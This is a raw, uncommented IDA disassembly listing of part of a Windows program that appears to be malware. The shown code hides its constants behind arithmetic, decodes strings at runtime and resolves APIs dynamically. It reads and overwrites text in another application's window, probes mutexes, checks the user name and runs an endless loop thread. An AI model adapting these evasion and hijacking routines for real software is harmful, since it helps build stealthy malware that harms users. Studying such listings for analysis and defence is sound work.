lea eax, [ebp+var_60EC0]
push eax
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_60ED0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_30E54]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word_44A180
sub eax, 4
cmp ebx, eax
jnz loc_4392CF
push offset dword_44B964
call sub_43C507
push [ebp+var_30E50]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_449634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_444020
add esp, 18h
and [ebp+var_60ED4], 0
lea eax, [ebp+var_60ED4]
push eax
push offset dword_44BA78
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A224
sub eax, 5
cmp ebx, eax
jnz loc_438F54
lea eax, [ebp+var_60ED8]
push eax
mov eax, [ebp+var_60ED4]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
cmp ebx, dword_44A138
jnz loc_438F48
lea eax, [ebp+var_60E9F]
push eax
push [ebp+var_60ED8]
call sub_43C434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_60EB8], edi
push [ebp+var_60ED8]
call ds:dword_449BA0
movsx eax, word_44A230
sub eax, 6
mov [ebp+var_40E9C], eax
jmp short loc_438B17
; ---------------------------------------------------------------------------
loc_438ACB: ; CODE XREF: sub_43858C+597�j
mov eax, [ebp+var_40E9C]
movsx eax, [ebp+eax+var_60E9F]
movsx edx, word_44A104
add edx, 5
cmp eax, edx
jz short loc_438AF5
movsx edx, word_44A130
add edx, 7
cmp eax, edx
jnz short loc_438B11
loc_438AF5: ; CODE XREF: sub_43858C+559�j
mov eax, [ebp+var_40E9C]
mov edx, dword_44A25C
add edx, dword_44A1D8
sub edx, 11h
mov [ebp+eax+var_60E9F], dl
loc_438B11: ; CODE XREF: sub_43858C+567�j
inc [ebp+var_40E9C]
loc_438B17: ; CODE XREF: sub_43858C+53D�j
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb short loc_438ACB
lea eax, [ebp+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_442F8C
mov eax, dword_44A148
sub eax, 2
mov [ebp+var_40E9C], eax
loc_438B46: ; CODE XREF: sub_43858C+70D�j
mov eax, [ebp+var_40E9C]
lea ecx, [ebp+eax+var_60E9F]
or eax, 0FFFFFFFFh
loc_438B56: ; CODE XREF: sub_43858C+5CF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_438B56
mov [ebp+var_60EA8], eax
mov edx, dword_44A184
add edx, dword_44A188
sub edx, 2
cmp eax, edx
jz short loc_438B8E
movsx edx, word_44A130
mov ecx, dword_44A13C
lea edx, [edx+ecx+0C2h]
cmp eax, edx
jbe short loc_438B93
loc_438B8E: ; CODE XREF: sub_43858C+5E8�j
jmp loc_438C6C
; ---------------------------------------------------------------------------
loc_438B93: ; CODE XREF: sub_43858C+600�j
mov eax, dword_44A1B0
sub eax, 7
mov [ebp+var_60EA4], eax
jmp short loc_438BD3
; ---------------------------------------------------------------------------
loc_438BA3: ; CODE XREF: sub_43858C+653�j
mov eax, [ebp+var_40E9C]
add eax, [ebp+var_60EA4]
movsx eax, [ebp+eax+var_60E9F]
mov edx, dword_44A13C
add edx, 17h
movsx ecx, word_44A144
add edx, ecx
cmp eax, edx
jnz short loc_438BE1
inc [ebp+var_60EA4]
loc_438BD3: ; CODE XREF: sub_43858C+615�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jb short loc_438BA3
loc_438BE1: ; CODE XREF: sub_43858C+63F�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_60EA4], eax
jz short loc_438C6C
mov eax, dword_44A1A8
movsx edx, word_44A218
add eax, edx
sub eax, 6
push eax
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call sub_4384B5
add esp, 0Ch
mov [ebp+var_60EDC], eax
mov eax, dword_44A154
add eax, 0FFF8h
cmp [ebp+var_60EDC], eax
jnz short loc_438C6C
push offset byte_44B95F
call sub_43C507
push eax
lea edi, [ebp+var_50E9B]
push edi
call ds:dword_444020
mov eax, [ebp+var_40E9C]
lea eax, [ebp+eax+var_60E9F]
push eax
lea eax, [ebp+var_50E9B]
push eax
call ds:dword_444020
add esp, 14h
loc_438C6C: ; CODE XREF: sub_43858C:loc_438B8E�j
; sub_43858C+661�j ...
mov eax, [ebp+var_60EA8]
movsx edx, word_44A1E0
movsx ecx, word_44A1C0
add edx, ecx
sub edx, 6
add eax, edx
add [ebp+var_40E9C], eax
mov eax, [ebp+var_60EB8]
cmp [ebp+var_40E9C], eax
jb loc_438B46
mov eax, dword_44A28C
sub eax, 6
mov [ebp+var_60EB4], eax
lea ecx, [ebp+var_50E9B]
or eax, 0FFFFFFFFh
loc_438CB6: ; CODE XREF: sub_43858C+72F�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_438CB6
mov [ebp+var_60EA8], eax
mov eax, dword_44A0AC
add eax, dword_44A0F4
sub eax, 8
mov [ebp+var_40E9C], eax
jmp loc_438F1A
; ---------------------------------------------------------------------------
loc_438CDC: ; CODE XREF: sub_43858C+99A�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44A254
add edx, 17h
add edx, dword_44A168
cmp eax, edx
jz short loc_438D04
and [ebp+var_60EAC], 0
loc_438D04: ; CODE XREF: sub_43858C+76F�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44A1C4
add edx, 13h
movsx ecx, word_44A150
add edx, ecx
cmp eax, edx
jnz loc_438EC6
movsx eax, word_44A230
movsx edx, word_44A124
add eax, edx
sub eax, 0Ch
cmp [ebp+var_40E9C], eax
jbe loc_438DFC
mov eax, [ebp+var_40E9C]
mov edx, dword_44A1B8
add edx, dword_44A25C
sub edx, 0Ch
sub eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44A1A0
add edx, 1Dh
cmp eax, edx
jle short loc_438D98
movsx edx, word_44A240
mov ecx, dword_44A224
lea edx, [edx+ecx+29h]
cmp eax, edx
jl short loc_438DF2
loc_438D98: ; CODE XREF: sub_43858C+7F5�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44A164
add edx, 35h
add edx, dword_44A168
cmp eax, edx
jle short loc_438DC0
movsx edx, word_44A260
add edx, 3Fh
cmp eax, edx
jl short loc_438DF2
loc_438DC0: ; CODE XREF: sub_43858C+824�j
movzx eax, [ebp+var_60EDD]
movsx edx, word_44A1A4
mov ecx, dword_44A1E4
lea edx, [edx+ecx+6Fh]
cmp eax, edx
jle short loc_438DFC
mov edx, dword_44A138
add edx, 76h
movsx ecx, word_44A24C
add edx, ecx
cmp eax, edx
jge short loc_438DFC
loc_438DF2: ; CODE XREF: sub_43858C+80A�j
; sub_43858C+832�j
mov [ebp+var_60EAC], 1
loc_438DFC: ; CODE XREF: sub_43858C+7B9�j
; sub_43858C+84E�j ...
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jnb loc_438EC6
mov eax, [ebp+var_40E9C]
movsx edx, word_44A240
add edx, dword_44A200
sub edx, 6
add eax, edx
mov al, [ebp+eax+var_50E9B]
mov [ebp+var_60EDD], al
movzx eax, [ebp+var_60EDD]
mov edx, dword_44A21C
add edx, 0Fh
add edx, dword_44A128
cmp eax, edx
jle short loc_438E60
mov edx, dword_44A0D4
add edx, 26h
add edx, dword_44A270
cmp eax, edx
jl short loc_438EBC
loc_438E60: ; CODE XREF: sub_43858C+8BF�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44A17C
add edx, 31h
movsx ecx, word_44A100
add edx, ecx
cmp eax, edx
jle short loc_438E92
movsx edx, word_44A174
mov ecx, dword_44A1A8
lea edx, [edx+ecx+38h]
cmp eax, edx
jl short loc_438EBC
loc_438E92: ; CODE XREF: sub_43858C+8EF�j
movzx eax, [ebp+var_60EDD]
mov edx, dword_44A0A0
add edx, 74h
movsx ecx, word_44A098
add edx, ecx
cmp eax, edx
jle short loc_438EC6
mov edx, dword_44A200
add edx, 7Ah
cmp eax, edx
jge short loc_438EC6
loc_438EBC: ; CODE XREF: sub_43858C+8D2�j
; sub_43858C+904�j
mov [ebp+var_60EAC], 1
loc_438EC6: ; CODE XREF: sub_43858C+79A�j
; sub_43858C+87C�j ...
cmp [ebp+var_60EAC], 0
jnz short loc_438EEF
mov eax, [ebp+var_60EB4]
mov edx, [ebp+var_40E9C]
mov dl, [ebp+edx+var_50E9B]
mov [ebp+eax+var_50E9B], dl
inc [ebp+var_60EB4]
loc_438EEF: ; CODE XREF: sub_43858C+941�j
mov eax, [ebp+var_40E9C]
movzx eax, [ebp+eax+var_50E9B]
mov edx, dword_44A1CC
add edx, 1Ah
cmp eax, edx
jnz short loc_438F14
mov [ebp+var_60EAC], 1
loc_438F14: ; CODE XREF: sub_43858C+97C�j
inc [ebp+var_40E9C]
loc_438F1A: ; CODE XREF: sub_43858C+74B�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_438CDC
mov eax, [ebp+var_60EB4]
mov edx, dword_44A0F4
add edx, dword_44A138
sub edx, 7
mov [ebp+eax+var_50E9B], dl
loc_438F48: ; CODE XREF: sub_43858C+4FD�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_438F54: ; CODE XREF: sub_43858C+4D9�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push offset dword_44BA88
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A158
sub eax, 9
cmp ebx, eax
jnz loc_439268
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word_44A174
movsx edx, word_44A264
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz loc_43925C
mov eax, dword_44A0AC
dec eax
mov [ebp-50EA0h], eax
jmp loc_43924A
; ---------------------------------------------------------------------------
loc_438FCA: ; CODE XREF: sub_43858C+CCA�j
mov eax, dword_44A1AC
sub eax, 5
push eax
call ds:dword_449630
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp-50EA0h]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
mov eax, dword_44A1E8
movsx edx, word_44A150
add eax, edx
sub eax, 9
cmp ebx, eax
jnz loc_439244
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push offset dword_44BA78
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, dword_44A128
sub eax, 9
cmp ebx, eax
jnz loc_439238
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44A168
add eax, dword_44A280
sub eax, 4
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_4390AE
cmp [ebp+var_60EF0], 8
jz short loc_4390B3
loc_4390AE: ; CODE XREF: sub_43858C+B16�j
jmp loc_43922C
; ---------------------------------------------------------------------------
loc_4390B3: ; CODE XREF: sub_43858C+B20�j
movsx eax, word_44A22C
add eax, dword_44A140
movsx edx, word_44A180
sub edx, 4
mov byte ptr [ebp+eax+var_70F00+1], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_43C434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call ds:dword_449BA0
mov eax, dword_44A1E8
movsx edx, word_44A0BC
add eax, edx
movsx eax, [ebp+eax+var_70EF9]
mov edx, dword_44A1F4
add edx, dword_44A1F8
sub edx, 7
cmp eax, edx
jz loc_43922C
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_43DB8B
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
mov eax, dword_44A254
movsx edx, word_44A1DC
add eax, edx
sub eax, 0Ah
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_44A158
mov edx, dword_44A198
sub edx, 2
mov byte ptr [ebp+eax+var_71F10], dl
or ebx, ebx
jnz short loc_4391B7
cmp [ebp+var_60EF0], 8
jnz short loc_4391B7
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_43C434
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F10], edi
push [ebp+var_60EE8]
call ds:dword_449BA0
loc_4391B7: ; CODE XREF: sub_43858C+BF5�j
; sub_43858C+BFF�j
push offset byte_44B957
call sub_43C507
push dword ptr [ebp-50EA0h]
push eax
lea edi, [ebp+var_30E3F]
push edi
call ds:dword_449634
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_444020
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_444020
push offset word_44B952
call sub_43C507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_444020
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_444020
add esp, 34h
loc_43922C: ; CODE XREF: sub_43858C:loc_4390AE�j
; sub_43858C+B96�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_439238: ; CODE XREF: sub_43858C+AE4�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_439244: ; CODE XREF: sub_43858C+AAF�j
inc dword ptr [ebp-50EA0h]
loc_43924A: ; CODE XREF: sub_43858C+A39�j
mov eax, [ebp+var_60EBC]
cmp [ebp-50EA0h], eax
jb loc_438FCA
loc_43925C: ; CODE XREF: sub_43858C+A27�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_439268: ; CODE XREF: sub_43858C+9F7�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, dword_44A1EC
sub edx, 8
cmp eax, edx
jz short loc_4392CF
push offset dword_44B94C
call sub_43C507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_444020
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call ds:dword_444020
push offset byte_44B947
call sub_43C507
push eax
lea edi, [ebp+var_30D40]
push edi
call ds:dword_444020
add esp, 20h
loc_4392CF: ; CODE XREF: sub_43858C+46F�j
; sub_43858C+CFA�j
inc [ebp+var_30E50]
loc_4392D5: ; CODE XREF: sub_43858C+3F9�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_43898A
loc_4392E7: ; CODE XREF: sub_43858C+28D�j
; sub_43858C+30D�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_4387D4
lea eax, [ebp+var_30D40]
push eax
call ds:dword_44962C
pop ecx
push [ebp+var_30E44]
call ds:dword_449BA0
push [ebp+var_30E48]
call ds:dword_449BA0
loc_439325: ; CODE XREF: sub_43858C+1EE�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_439331: ; CODE XREF: sub_43858C+1C7�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_43933D: ; CODE XREF: sub_43858C+1A4�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_439349: ; CODE XREF: sub_43858C+C7�j
; sub_43858C:loc_4386A7�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_439355: ; CODE XREF: sub_43858C+61�j
; sub_43858C+A2�j
pop edi
pop esi
pop ebx
leave
retn
sub_43858C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43935A proc near ; CODE XREF: sub_43ABE3+94�p
; sub_43ABE3+CE�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_43939B
cmp al, 79h
jz short loc_43939B
cmp al, 75h
jz short loc_43939B
cmp al, 69h
jz short loc_43939B
cmp al, 6Fh
jz short loc_43939B
cmp al, 61h
jnz short loc_43939F
loc_43939B: ; CODE XREF: sub_43935A+2B�j
; sub_43935A+2F�j ...
add [ebp+arg_0], 1
loc_43939F: ; CODE XREF: sub_43935A+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_4393A9
add [ebp+arg_0], 1
loc_4393A9: ; CODE XREF: sub_43935A+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_43935A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4393B1 proc near ; CODE XREF: sub_43B912+61�p
var_100C = byte ptr -100Ch
var_1004 = byte ptr -1004h
var_1003 = byte ptr -1003h
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1000h
call sub_442F6C
push ebx
push esi
push edi
push offset byte_44B935
call sub_43C507
pop ecx
push 0
push eax
push 0
push [ebp+arg_0]
call ds:dword_44963C ; FindWindowExA
mov edi, eax
or edi, edi
jnz short loc_4393E3
mov edi, [ebp+arg_0]
loc_4393E3: ; CODE XREF: sub_4393B1+2D�j
push offset byte_44B91F
call sub_43C507
pop ecx
push 0
push eax
push 0
push edi
call ds:dword_44963C ; FindWindowExA
mov edi, eax
lea eax, [ebp+var_FFF]
push eax
push 0FFFh
push 0Dh
push edi
call ds:dword_444014 ; SendMessageA
movsx eax, word_44A1B4
add eax, dword_44A188
cmp [ebp+eax+var_1003], 20h
jnz short loc_439441
mov eax, dword_44A194
add eax, dword_44A1C4
cmp [ebp+eax+var_100C], 20h
jz loc_4394D8
loc_439441: ; CODE XREF: sub_4393B1+75�j
mov eax, dword_44A0C8
cmp [ebp+eax+var_FFF], 68h
jnz short loc_439467
movsx eax, word_44A230
add eax, dword_44A188
cmp [ebp+eax+var_1004], 74h
jz short loc_4394D8
loc_439467: ; CODE XREF: sub_4393B1+9D�j
lea ecx, [ebp+var_FFF]
or eax, 0FFFFFFFFh
loc_439470: ; CODE XREF: sub_4393B1+C4�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_439470
mov ebx, dword_44A274
add ebx, 0Ch
cmp eax, ebx
jb short loc_4394D8
push offset word_44B91A
call sub_43C507
mov esi, dword_44A128
sub esi, 5
push esi
push eax
lea esi, [ebp+var_FFF]
push esi
call sub_4384B5
add esp, 10h
movsx ebx, word_44A1A4
add ebx, 0FFF8h
cmp eax, ebx
jnz short loc_4394D8
push offset dword_44B914
call sub_43C507
pop ecx
push eax
mov esi, dword_44A214
sub esi, 9
push esi
push 0Ch
push edi
call ds:dword_444014 ; SendMessageA
loc_4394D8: ; CODE XREF: sub_4393B1+8A�j
; sub_4393B1+B4�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4393B1 endp
; =============== S U B R O U T I N E =======================================
sub_4394DD proc near ; CODE XREF: sub_43EC0A+1B�p
push edi
push offset dword_44B904
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2A8, eax
test eax, eax
jnz short loc_439510
push offset dword_44B8F4
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2A8, eax
loc_439510: ; CODE XREF: sub_4394DD+1A�j
push offset word_44B8E2
call sub_43C507
push eax
push dword_44A2A8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444044, eax
push offset byte_44B8D1
call sub_43C507
push eax
push dword_44A2A8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449BA0, eax
push offset byte_44B8C1
call sub_43C507
push eax
push dword_44A2A8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_449BB0, eax
push offset word_44B8B2
call sub_43C507
push eax
push dword_44A2A8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_444038, eax
push offset word_44B8A2
call sub_43C507
add esp, 14h
push eax
push dword_44A2A8
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_447254, eax
pop edi
retn
sub_4394DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4395A1 proc near ; DATA XREF: .data:0044A378�o
push ebp
mov ebp, esp
push offset dword_449BA8
call ds:dword_446A3C ; InterlockedIncrement
mov eax, ds:dword_449BA8
pop ebp
retn 4
sub_4395A1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4395B8 proc near ; DATA XREF: .data:off_44A374�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+arg_4]
mov edi, [ebp+arg_8]
push offset dword_44BAC8
push esi
call ds:dword_449648
or eax, eax
jz short loc_4395E4
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43962C
; ---------------------------------------------------------------------------
loc_4395E4: ; CODE XREF: sub_4395B8+1A�j
push offset dword_44BA48
push esi
call ds:dword_449648
or eax, eax
jz short loc_439604
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43962C
; ---------------------------------------------------------------------------
loc_439604: ; CODE XREF: sub_4395B8+3A�j
push offset dword_44BA18
push esi
call ds:dword_449648
or eax, eax
jz short loc_439624
mov eax, [ebp+arg_0]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_43962C
; ---------------------------------------------------------------------------
loc_439624: ; CODE XREF: sub_4395B8+5A�j
and dword ptr [edi], 0
mov eax, 80004002h
loc_43962C: ; CODE XREF: sub_4395B8+2A�j
; sub_4395B8+4A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_4395B8 endp
; =============== S U B R O U T I N E =======================================
sub_439633 proc near ; DATA XREF: .data:0044A3AC�o
mov eax, 80004001h
retn 18h
sub_439633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_43963B proc near ; DATA XREF: sub_4399CB+154�o
var_A = byte ptr -0Ah
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov edi, [ebp+arg_0]
push offset sub_43B490
push dword ptr fs:0
mov fs:0, esp
push offset word_44B89A
call sub_43C507
push dword ptr [edi]
push eax
lea esi, [ebp+var_A]
push esi
call ds:dword_449634
add esp, 10h
loc_439671: ; CODE XREF: sub_43963B+5B�j
push 0
push dword ptr [edi]
lea eax, [ebp+var_A]
push eax
call sub_43D357
mov eax, dword_44A23C
add eax, dword_44A108
sub eax, 0Bh
push eax
call ds:dword_449630
add esp, 10h
jmp short loc_439671
sub_43963B endp
; ---------------------------------------------------------------------------
pop edi
pop esi
leave
retn 4
; =============== S U B R O U T I N E =======================================
sub_43969E proc near ; CODE XREF: sub_43EC0A+25�p
push edi
push offset dword_44B88C
call sub_43C507
pop ecx
push eax
call ds:dword_4465E8 ; GetModuleHandleA
mov dword_44A2B0, eax
test eax, eax
jnz short loc_4396D1
push offset asc_44B87E ; "\n"
call sub_43C507
pop ecx
push eax
call ds:dword_447244 ; LoadLibraryA
mov dword_44A2B0, eax
loc_4396D1: ; CODE XREF: sub_43969E+1A�j
cmp dword_44A2B0, 0
jz short loc_4396F4
mov eax, dword_44A248
add eax, 5
push eax
push dword_44A2B0
call ds:dword_4461F8 ; GetProcAddress
mov ds:dword_44401C, eax
loc_4396F4: ; CODE XREF: sub_43969E+3A�j
pop edi
retn
sub_43969E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4396F6 proc near ; CODE XREF: sub_43EC0A:loc_43EC45�p
; sub_44083E+261�p
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 108h
push esi
push edi
movsx eax, word_44A150
mov edi, eax
add edi, dword_44A0B8
sub edi, 9
jmp short loc_439784
; ---------------------------------------------------------------------------
loc_439715: ; CODE XREF: sub_4396F6+A1�j
push offset word_44B872
call sub_43C507
mov [ebp+var_108], eax
push offset dword_44B868
call sub_43C507
push edi
push eax
mov esi, [ebp+var_108]
push esi
lea esi, [ebp+var_FF]
push esi
call ds:dword_449634
add esp, 18h
lea eax, [ebp+var_FF]
push eax
push 0
push 1F0001h
call ds:dword_448648 ; OpenMutexA
mov [ebp+var_104], eax
or eax, eax
jz short loc_439783
push eax
call ds:dword_448654 ; CloseHandle
mov eax, dword_44A0B8
dec eax
cmp edi, eax
jnz short loc_43977C
xor eax, eax
inc eax
jmp short loc_43979F
; ---------------------------------------------------------------------------
loc_43977C: ; CODE XREF: sub_4396F6+7F�j
mov eax, 2
jmp short loc_43979F
; ---------------------------------------------------------------------------
loc_439783: ; CODE XREF: sub_4396F6+6E�j
inc edi
loc_439784: ; CODE XREF: sub_4396F6+1D�j
mov eax, dword_44A234
add eax, 5Ch
movsx edx, word_44A178
add eax, edx
cmp edi, eax
jb loc_439715
xor eax, eax
loc_43979F: ; CODE XREF: sub_4396F6+84�j
; sub_4396F6+8B�j
pop edi
pop esi
leave
retn
sub_4396F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4397A3 proc near ; CODE XREF: sub_43EC0A+34�p
var_104 = dword ptr -104h
var_FF = byte ptr -0FFh
push ebp
mov ebp, esp
sub esp, 104h
push esi
push edi
mov [ebp+var_104], 0FFh
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_FF]
push eax
call ds:dword_4465F0 ; GetUserNameA
push offset word_44B85E
call sub_43C507
mov edi, dword_44A138
add edi, dword_44A0DC
sub edi, 2
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_4384B5
add esp, 10h
movsx esi, word_44A1F0
add esi, 0FFFCh
cmp eax, esi
jz short loc_43980C
xor eax, eax
inc eax
jmp short loc_439853
; ---------------------------------------------------------------------------
loc_43980C: ; CODE XREF: sub_4397A3+62�j
push offset word_44B852
call sub_43C507
mov edi, dword_44A1D0
add edi, dword_44A0A0
sub edi, 0Ah
push edi
push eax
lea edi, [ebp+var_FF]
push edi
call sub_4384B5
add esp, 10h
mov esi, dword_44A258
add esi, 0FFF9h
add esi, dword_44A270
cmp eax, esi
jz short loc_439851
xor eax, eax
inc eax
jmp short loc_439853
; ---------------------------------------------------------------------------
loc_439851: ; CODE XREF: sub_4397A3+A7�j
xor eax, eax
loc_439853: ; CODE XREF: sub_4397A3+67�j
; sub_4397A3+AC�j
pop edi
pop esi
leave
retn
sub_4397A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_439857 proc near ; DATA XREF: .data:0044A3B0�o
var_2C = byte ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov eax, [ebp+arg_10]
mov word ptr [ebp+arg_10], ax
movsx eax, word_44A27C
add eax, 0C4h
cmp [ebp+arg_4], eax
jnz loc_439986
mov [ebp+var_18], 3
lea eax, [ebp+var_10]
push eax
mov eax, dword_44A394
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov [ebp+var_4], eax
movsx eax, word_44A27C
add eax, dword_44A0B4
sub eax, 0Ch
cmp [ebp+var_4], eax
jnz loc_439982
dec [ebp+var_10]
lea eax, [ebp+var_1C]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, dword_44A394
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov [ebp+var_4], eax
mov eax, dword_44A26C
sub eax, 9
cmp [ebp+var_4], eax
jnz loc_439982
lea eax, [ebp+var_20]
push eax
push offset dword_44BAD8
mov eax, [ebp+var_1C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov [ebp+var_4], eax
mov eax, dword_44A254
add eax, dword_44A224
sub eax, 0Eh
cmp [ebp+var_4], eax
jnz short loc_439979
lea eax, off_44A390
mov [ebp+var_8], eax
push eax
mov ebx, [eax]
call dword ptr [ebx+4]
lea eax, [ebp+var_24]
push eax
push offset dword_44BA18
